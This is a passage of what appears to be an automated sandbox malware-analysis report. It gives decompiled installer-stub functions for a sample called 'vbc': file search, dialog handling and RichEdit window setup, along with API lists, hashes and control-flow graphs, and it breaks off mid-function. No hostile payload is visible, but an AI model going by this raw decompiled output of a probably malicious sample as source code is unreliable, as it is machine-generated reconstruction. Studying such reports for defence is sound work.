                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-2602864334
                                                • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406873(WCHAR* _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                                                				if(_t2 == 0xffffffff) {
                                                					return 0;
                                                				}
                                                				FindClose(_t2);
                                                				return 0x4302b8;
                                                			}




                                                0x0040687e
                                                0x00406887
                                                0x00000000
                                                0x00406894
                                                0x0040688a
                                                0x00000000

                                                APIs
                                                • FindFirstFileW.KERNELBASE(74EDD4C4,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                • FindClose.KERNEL32(00000000), ref: 0040688A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 197 403fbe-403fc7 195->197 198 404171-404186 196->198 199 404124-40416c GetDlgItem * 2 call 404499 SetClassLongW call 40140b 196->199 200 403fc9-403fd6 SetWindowPos 197->200 201 403fdc-403fe3 197->201 203 4041c6-4041cb call 4044e5 198->203 204 404188-40418b 198->204 199->198 200->201 206 403fe5-403fff ShowWindow 201->206 207 404027-40402d 201->207 212 4041d0-4041eb 203->212 209 40418d-404198 call 401389 204->209 210 4041be-4041c0 204->210 213 404100-40410e call 404500 206->213 214 404005-404018 GetWindowLongW 206->214 215 404046-404049 207->215 216 40402f-404041 DestroyWindow 207->216 209->210 229 40419a-4041b9 SendMessageW 209->229 210->203 211 404466 210->211 224 404468-40446f 211->224 221 4041f4-4041fa 212->221 222 4041ed-4041ef call 40140b 212->222 213->224 214->213 223 40401e-404021 ShowWindow 214->223 227 40404b-404057 SetWindowLongW 215->227 228 40405c-404062 215->228 225 404443-404449 216->225 233 404200-40420b 221->233 234 404424-40443d DestroyWindow EndDialog 221->234 222->221 223->207 225->211 232 40444b-404451 225->232 227->224 228->213 235 404068-404077 GetDlgItem 228->235 229->224 232->211 236 404453-40445c ShowWindow 232->236 233->234 237 404211-40425e call 40657a call 404499 * 3 GetDlgItem 233->237 234->225 238 404096-404099 235->238 239 404079-404090 SendMessageW IsWindowEnabled 235->239 236->211 266 404260-404265 237->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 237->267 240 40409b-40409c 238->240 241 40409e-4040a1 238->241 239->211 239->238 243 4040cc-4040d1 call 404472 240->243 244 4040a3-4040a9 241->244 245 4040af-4040b4 241->245 243->213 247 4040ea-4040fa SendMessageW 244->247 248 4040ab-4040ad 244->248 245->247 249 4040b6-4040bc 245->249 247->213 248->243 252 4040d3-4040dc call 40140b 249->252 253 4040be-4040c4 call 40140b 249->253 252->213 262 4040de-4040e8 252->262 264 4040ca 253->264 262->264 264->243 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->212 286 404339-40433b 275->286 286->212 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->225 291 40437e-4043ab CreateDialogParamW 288->291 289->211 290 404353-404359 289->290 290->212 292 40435f 290->292 291->225 293 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->211 293->211 298 40440a-40441d ShowWindow call 4044e5 293->298 300 404422 298->300 300->225
                                                C-Code - Quality: 84%
                                                			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                				struct HWND__* _v28;
                                                				void* _v84;
                                                				void* _v88;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t34;
                                                				signed int _t36;
                                                				signed int _t38;
                                                				struct HWND__* _t48;
                                                				signed int _t67;
                                                				struct HWND__* _t73;
                                                				signed int _t86;
                                                				struct HWND__* _t91;
                                                				signed int _t99;
                                                				int _t103;
                                                				signed int _t117;
                                                				int _t118;
                                                				int _t122;
                                                				signed int _t124;
                                                				struct HWND__* _t127;
                                                				struct HWND__* _t128;
                                                				int _t129;
                                                				intOrPtr _t130;
                                                				long _t133;
                                                				int _t135;
                                                				int _t136;
                                                				void* _t137;
                                                
                                                				_t130 = _a8;
                                                				if(_t130 == 0x110 || _t130 == 0x408) {
                                                					_t34 = _a12;
                                                					_t127 = _a4;
                                                					__eflags = _t130 - 0x110;
                                                					 *0x42d250 = _t34;
                                                					if(_t130 == 0x110) {
                                                						 *0x434f08 = _t127;
                                                						 *0x42d264 = GetDlgItem(_t127, 1);
                                                						_t91 = GetDlgItem(_t127, 2);
                                                						_push(0xffffffff);
                                                						_push(0x1c);
                                                						 *0x42b230 = _t91;
                                                						E00404499(_t127);
                                                						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
                                                						 *0x433ecc = E0040140B(4);
                                                						_t34 = 1;
                                                						__eflags = 1;
                                                						 *0x42d250 = 1;
                                                					}
                                                					_t124 =  *0x40a368; // 0x0
                                                					_t136 = 0;
                                                					_t133 = (_t124 << 6) +  *0x434f20;
                                                					__eflags = _t124;
                                                					if(_t124 < 0) {
                                                						L36:
                                                						E004044E5(0x40b);
                                                						while(1) {
                                                							_t36 =  *0x42d250;
                                                							 *0x40a368 =  *0x40a368 + _t36;
                                                							_t133 = _t133 + (_t36 << 6);
                                                							_t38 =  *0x40a368; // 0x0
                                                							__eflags = _t38 -  *0x434f24;
                                                							if(_t38 ==  *0x434f24) {
                                                								E0040140B(1);
                                                							}
                                                							__eflags =  *0x433ecc - _t136;
                                                							if( *0x433ecc != _t136) {
                                                								break;
                                                							}
                                                							__eflags =  *0x40a368 -  *0x434f24; // 0x0
                                                							if(__eflags >= 0) {
                                                								break;
                                                							}
                                                							_t117 =  *(_t133 + 0x14);
                                                							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                                                							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                							_push(0xfffffc19);
                                                							E00404499(_t127);
                                                							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                							_push(0xfffffc1b);
                                                							E00404499(_t127);
                                                							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                							_push(0xfffffc1a);
                                                							E00404499(_t127);
                                                							_t48 = GetDlgItem(_t127, 3);
                                                							__eflags =  *0x434f8c - _t136;
                                                							_v28 = _t48;
                                                							if( *0x434f8c != _t136) {
                                                								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                								__eflags = _t117;
                                                							}
                                                							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                							E004044BB(_t117 & 0x00000002);
                                                							_t118 = _t117 & 0x00000004;
                                                							EnableWindow( *0x42b230, _t118);
                                                							__eflags = _t118 - _t136;
                                                							if(_t118 == _t136) {
                                                								_push(1);
                                                							} else {
                                                								_push(_t136);
                                                							}
                                                							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                							__eflags =  *0x434f8c - _t136;
                                                							if( *0x434f8c == _t136) {
                                                								_push( *0x42d264);
                                                							} else {
                                                								SendMessageW(_t127, 0x401, 2, _t136);
                                                								_push( *0x42b230);
                                                							}
                                                							E004044CE();
                                                							E0040653D(0x42d268, E00403F7B());
                                                							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                							SetWindowTextW(_t127, 0x42d268); // executed
                                                							_push(_t136);
                                                							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                							__eflags = _t67;
                                                							if(_t67 != 0) {
                                                								continue;
                                                							} else {
                                                								__eflags =  *_t133 - _t136;
                                                								if( *_t133 == _t136) {
                                                									continue;
                                                								}
                                                								__eflags =  *(_t133 + 4) - 5;
                                                								if( *(_t133 + 4) != 5) {
                                                									DestroyWindow( *0x433ed8); // executed
                                                									 *0x42c240 = _t133;
                                                									__eflags =  *_t133 - _t136;
                                                									if( *_t133 <= _t136) {
                                                										goto L60;
                                                									}
                                                									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
                                                									__eflags = _t73 - _t136;
                                                									 *0x433ed8 = _t73;
                                                									if(_t73 == _t136) {
                                                										goto L60;
                                                									}
                                                									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                									_push(6);
                                                									E00404499(_t73);
                                                									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                									ScreenToClient(_t127, _t137 + 0x10);
                                                									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                									_push(_t136);
                                                									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                									__eflags =  *0x433ecc - _t136;
                                                									if( *0x433ecc != _t136) {
                                                										goto L63;
                                                									}
                                                									ShowWindow( *0x433ed8, 8); // executed
                                                									E004044E5(0x405);
                                                									goto L60;
                                                								}
                                                								__eflags =  *0x434f8c - _t136;
                                                								if( *0x434f8c != _t136) {
                                                									goto L63;
                                                								}
                                                								__eflags =  *0x434f80 - _t136;
                                                								if( *0x434f80 != _t136) {
                                                									continue;
                                                								}
                                                								goto L63;
                                                							}
                                                						}
                                                						DestroyWindow( *0x433ed8);
                                                						 *0x434f08 = _t136;
                                                						EndDialog(_t127,  *0x42ba38);
                                                						goto L60;
                                                					} else {
                                                						__eflags = _t34 - 1;
                                                						if(_t34 != 1) {
                                                							L35:
                                                							__eflags =  *_t133 - _t136;
                                                							if( *_t133 == _t136) {
                                                								goto L63;
                                                							}
                                                							goto L36;
                                                						}
                                                						_push(0);
                                                						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                						__eflags = _t86;
                                                						if(_t86 == 0) {
                                                							goto L35;
                                                						}
                                                						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                                                						__eflags =  *0x433ecc;
                                                						return 0 |  *0x433ecc == 0x00000000;
                                                					}
                                                				} else {
                                                					_t127 = _a4;
                                                					_t136 = 0;
                                                					if(_t130 == 0x47) {
                                                						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                                                					}
                                                					_t122 = _a12;
                                                					if(_t130 != 5) {
                                                						L8:
                                                						if(_t130 != 0x40d) {
                                                							__eflags = _t130 - 0x11;
                                                							if(_t130 != 0x11) {
                                                								__eflags = _t130 - 0x111;
                                                								if(_t130 != 0x111) {
                                                									goto L28;
                                                								}
                                                								_t135 = _t122 & 0x0000ffff;
                                                								_t128 = GetDlgItem(_t127, _t135);
                                                								__eflags = _t128 - _t136;
                                                								if(_t128 == _t136) {
                                                									L15:
                                                									__eflags = _t135 - 1;
                                                									if(_t135 != 1) {
                                                										__eflags = _t135 - 3;
                                                										if(_t135 != 3) {
                                                											_t129 = 2;
                                                											__eflags = _t135 - _t129;
                                                											if(_t135 != _t129) {
                                                												L27:
                                                												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                                                												goto L28;
                                                											}
                                                											__eflags =  *0x434f8c - _t136;
                                                											if( *0x434f8c == _t136) {
                                                												_t99 = E0040140B(3);
                                                												__eflags = _t99;
                                                												if(_t99 != 0) {
                                                													goto L28;
                                                												}
                                                												 *0x42ba38 = 1;
                                                												L23:
                                                												_push(0x78);
                                                												L24:
                                                												E00404472();
                                                												goto L28;
                                                											}
                                                											E0040140B(_t129);
                                                											 *0x42ba38 = _t129;
                                                											goto L23;
                                                										}
                                                										__eflags =  *0x40a368 - _t136; // 0x0
                                                										if(__eflags <= 0) {
                                                											goto L27;
                                                										}
                                                										_push(0xffffffff);
                                                										goto L24;
                                                									}
                                                									_push(_t135);
                                                									goto L24;
                                                								}
                                                								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                								_t103 = IsWindowEnabled(_t128);
                                                								__eflags = _t103;
                                                								if(_t103 == 0) {
                                                									L63:
                                                									return 0;
                                                								}
                                                								goto L15;
                                                							}
                                                							SetWindowLongW(_t127, _t136, _t136);
                                                							return 1;
                                                						}
                                                						DestroyWindow( *0x433ed8);
                                                						 *0x433ed8 = _t122;
                                                						L60:
                                                						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
                                                							ShowWindow(_t127, 0xa); // executed
                                                							 *0x42f268 = 1;
                                                						}
                                                						goto L63;
                                                					} else {
                                                						asm("sbb eax, eax");
                                                						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                                                						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                							L28:
                                                							return E00404500(_a8, _t122, _a16);
                                                						} else {
                                                							ShowWindow(_t127, 4);
                                                							goto L8;
                                                						}
                                                					}
                                                				}
                                                			}































                                                0x00403fa5
                                                0x00403fac
                                                0x00404113
                                                0x00404117
                                                0x0040411b
                                                0x0040411d
                                                0x00404122
                                                0x0040412d
                                                0x00404138
                                                0x0040413d
                                                0x0040413f
                                                0x00404141
                                                0x00404144
                                                0x00404149
                                                0x00404157
                                                0x00404164
                                                0x0040416b
                                                0x0040416b
                                                0x0040416c
                                                0x0040416c
                                                0x00404171
                                                0x00404177
                                                0x0040417e
                                                0x00404184
                                                0x00404186
                                                0x004041c6
                                                0x004041cb
                                                0x004041d0
                                                0x004041d0
                                                0x004041d5
                                                0x004041de
                                                0x004041e0
                                                0x004041e5
                                                0x004041eb
                                                0x004041ef
                                                0x004041ef
                                                0x004041f4
                                                0x004041fa
                                                0x00000000
                                                0x00000000
                                                0x00404205
                                                0x0040420b
                                                0x00000000
                                                0x00000000
                                                0x00404214
                                                0x0040421c
                                                0x00404221
                                                0x00404224
                                                0x0040422a
                                                0x0040422f
                                                0x00404232
                                                0x00404238
                                                0x0040423d
                                                0x00404240
                                                0x00404246
                                                0x0040424e
                                                0x00404254
                                                0x0040425a
                                                0x0040425e
                                                0x00404265
                                                0x00404265
                                                0x00404265
                                                0x0040426f
                                                0x00404281
                                                0x0040428d
                                                0x00404292
                                                0x0040429c
                                                0x004042a2
                                                0x004042a4
                                                0x004042a9
                                                0x004042a6
                                                0x004042a6
                                                0x004042a6
                                                0x004042b9
                                                0x004042d1
                                                0x004042d3
                                                0x004042d9
                                                0x004042ee
                                                0x004042db
                                                0x004042e4
                                                0x004042e6
                                                0x004042e6
                                                0x004042f4
                                                0x00404305
                                                0x0040431b
                                                0x00404322
                                                0x00404328
                                                0x0040432c
                                                0x00404331
                                                0x00404333
                                                0x00000000
                                                0x00404339
                                                0x00404339
                                                0x0040433b
                                                0x00000000
                                                0x00000000
                                                0x00404341
                                                0x00404345
                                                0x0040436a
                                                0x00404370
                                                0x00404376
                                                0x00404378
                                                0x00000000
                                                0x00000000
                                                0x0040439e
                                                0x004043a4
                                                0x004043a6
                                                0x004043ab
                                                0x00000000
                                                0x00000000
                                                0x004043b1
                                                0x004043b4
                                                0x004043b7
                                                0x004043ce
                                                0x004043da
                                                0x004043f3
                                                0x004043f9
                                                0x004043fd
                                                0x00404402
                                                0x00404408
                                                0x00000000
                                                0x00000000
                                                0x00404412
                                                0x0040441d
                                                0x00000000
                                                0x0040441d
                                                0x00404347
                                                0x0040434d
                                                0x00000000
                                                0x00000000
                                                0x00404353
                                                0x00404359
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040435f
                                                0x00404333
                                                0x0040442a
                                                0x00404436
                                                0x0040443d
                                                0x00000000
                                                0x00404188
                                                0x00404188
                                                0x0040418b
                                                0x004041be
                                                0x004041be
                                                0x004041c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004041c0
                                                0x0040418d
                                                0x00404191
                                                0x00404196
                                                0x00404198
                                                0x00000000
                                                0x00000000
                                                0x004041a8
                                                0x004041b0
                                                0x00000000
                                                0x004041b6
                                                0x00403fbe
                                                0x00403fbe
                                                0x00403fc2
                                                0x00403fc7
                                                0x00403fd6
                                                0x00403fd6
                                                0x00403fdc
                                                0x00403fe3
                                                0x00404027
                                                0x0040402d
                                                0x00404046
                                                0x00404049
                                                0x0040405c
                                                0x00404062
                                                0x00000000
                                                0x00000000
                                                0x00404068
                                                0x00404073
                                                0x00404075
                                                0x00404077
                                                0x00404096
                                                0x00404096
                                                0x00404099
                                                0x0040409e
                                                0x004040a1
                                                0x004040b1
                                                0x004040b2
                                                0x004040b4
                                                0x004040ea
                                                0x004040fa
                                                0x00000000
                                                0x004040fa
                                                0x004040b6
                                                0x004040bc
                                                0x004040d5
                                                0x004040da
                                                0x004040dc
                                                0x00000000
                                                0x00000000
                                                0x004040de
                                                0x004040ca
                                                0x004040ca
                                                0x004040cc
                                                0x004040cc
                                                0x00000000
                                                0x004040cc
                                                0x004040bf
                                                0x004040c4
                                                0x00000000
                                                0x004040c4
                                                0x004040a3
                                                0x004040a9
                                                0x00000000
                                                0x00000000
                                                0x004040ab
                                                0x00000000
                                                0x004040ab
                                                0x0040409b
                                                0x00000000
                                                0x0040409b
                                                0x00404081
                                                0x00404088
                                                0x0040408e
                                                0x00404090
                                                0x00404466
                                                0x00000000
                                                0x00404466
                                                0x00000000
                                                0x00404090
                                                0x0040404e
                                                0x00000000
                                                0x00404056
                                                0x00404035
                                                0x0040403b
                                                0x00404443
                                                0x00404449
                                                0x00404456
                                                0x0040445c
                                                0x0040445c
                                                0x00000000
                                                0x00403fe5
                                                0x00403fea
                                                0x00403ff6
                                                0x00403fff
                                                0x00404100
                                                0x00000000
                                                0x0040401e
                                                0x00404021
                                                0x00000000
                                                0x00404021
                                                0x00403fff
                                                0x00403fe3

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                • ShowWindow.USER32(?), ref: 00403FF6
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                • ShowWindow.USER32(?,00000004), ref: 00404021
                                                • DestroyWindow.USER32 ref: 00404035
                                                • SetWindowLongW.USER32 ref: 0040404E
                                                • GetDlgItem.USER32(?,?), ref: 0040406D
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                • EnableWindow.USER32(?,?), ref: 0040429C
                                                • GetSystemMenu.USER32 ref: 004042B2
                                                • EnableMenuItem.USER32 ref: 004042B9
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                • SetWindowTextW.USER32 ref: 00404322
                                                • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID:
                                                • API String ID: 121052019-0
                                                • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 314 403c72-403c9b call 403ec2 call 405f14 304->314 310 403c51-403c62 call 40640b 305->310 311 403c67-403c6d lstrcatW 305->311 310->311 311->314 319 403ca1-403ca6 314->319 320 403d2d-403d35 call 405f14 314->320 319->320 321 403cac-403cd4 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 321->320 328 403cd6-403cda 321->328 330 403de9-403df1 call 40140b 326->330 331 403d6a-403d9a RegisterClassW 326->331 327->326 332 403cec-403cf8 lstrlenW 328->332 333 403cdc-403ce9 call 405e39 328->333 345 403df3-403df6 330->345 346 403dfb-403e06 call 403ec2 330->346 334 403da0-403de4 SystemParametersInfoW CreateWindowExW 331->334 335 403eb8 331->335 339 403d20-403d28 call 405e0c call 40653d 332->339 340 403cfa-403d08 lstrcmpiW 332->340 333->332 334->330 338 403eba-403ec1 335->338 339->320 340->339 344 403d0a-403d14 GetFileAttributesW 340->344 349 403d16-403d18 344->349 350 403d1a-403d1b call 405e58 344->350 345->338 354 403e0c-403e26 ShowWindow call 40689a 346->354 355 403e8f-403e90 call 405672 346->355 349->339 349->350 350->339 362 403e32-403e44 GetClassInfoW 354->362 363 403e28-403e2d call 40689a 354->363 358 403e95-403e97 355->358 360 403eb1-403eb3 call 40140b 358->360 361 403e99-403e9f 358->361 360->335 361->345 364 403ea5-403eac call 40140b 361->364 367 403e46-403e56 GetClassInfoW RegisterClassW 362->367 368 403e5c-403e7f DialogBoxParamW call 40140b 362->368 363->362 364->345 367->368 372 403e84-403e8d call 403b3c 368->372 372->338
                                                C-Code - Quality: 96%
                                                			E00403BEC(void* __eflags) {
                                                				intOrPtr _v4;
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				void _v16;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t22;
                                                				void* _t30;
                                                				void* _t32;
                                                				int _t33;
                                                				void* _t36;
                                                				int _t39;
                                                				int _t40;
                                                				int _t44;
                                                				short _t63;
                                                				WCHAR* _t65;
                                                				signed char _t69;
                                                				WCHAR* _t76;
                                                				intOrPtr _t82;
                                                				WCHAR* _t87;
                                                
                                                				_t82 =  *0x434f10;
                                                				_t22 = E0040690A(2);
                                                				_t90 = _t22;
                                                				if(_t22 == 0) {
                                                					_t76 = 0x42d268;
                                                					L"1033" = 0x30;
                                                					 *0x442002 = 0x78;
                                                					 *0x442004 = 0;
                                                					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                                                					__eflags =  *0x42d268;
                                                					if(__eflags == 0) {
                                                						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                                                					}
                                                					lstrcatW(L"1033", _t76);
                                                				} else {
                                                					E00406484(L"1033",  *_t22() & 0x0000ffff);
                                                				}
                                                				E00403EC2(_t78, _t90);
                                                				 *0x434f80 =  *0x434f18 & 0x00000020;
                                                				 *0x434f9c = 0x10000;
                                                				if(E00405F14(_t90, 0x440800) != 0) {
                                                					L16:
                                                					if(E00405F14(_t98, 0x440800) == 0) {
                                                						E0040657A(_t76, 0, _t82, 0x440800,  *((intOrPtr*)(_t82 + 0x118)));
                                                					}
                                                					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040);
                                                					 *0x433ee8 = _t30;
                                                					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                						L21:
                                                						if(E0040140B(0) == 0) {
                                                							_t32 = E00403EC2(_t78, __eflags);
                                                							__eflags =  *0x434fa0;
                                                							if( *0x434fa0 != 0) {
                                                								_t33 = E00405672(_t32, 0);
                                                								__eflags = _t33;
                                                								if(_t33 == 0) {
                                                									E0040140B(1);
                                                									goto L33;
                                                								}
                                                								__eflags =  *0x433ecc;
                                                								if( *0x433ecc == 0) {
                                                									E0040140B(2);
                                                								}
                                                								goto L22;
                                                							}
                                                							ShowWindow( *0x42d248, 5); // executed
                                                							_t39 = E0040689A("RichEd20"); // executed
                                                							__eflags = _t39;
                                                							if(_t39 == 0) {
                                                								E0040689A("RichEd32");
                                                							}
                                                							_t87 = L"RichEdit20W";
                                                							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                                                							__eflags = _t40;
                                                							if(_t40 == 0) {
                                                								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                                                								 *0x433ec4 = _t87;
                                                								RegisterClassW(0x433ea0);
                                                							}
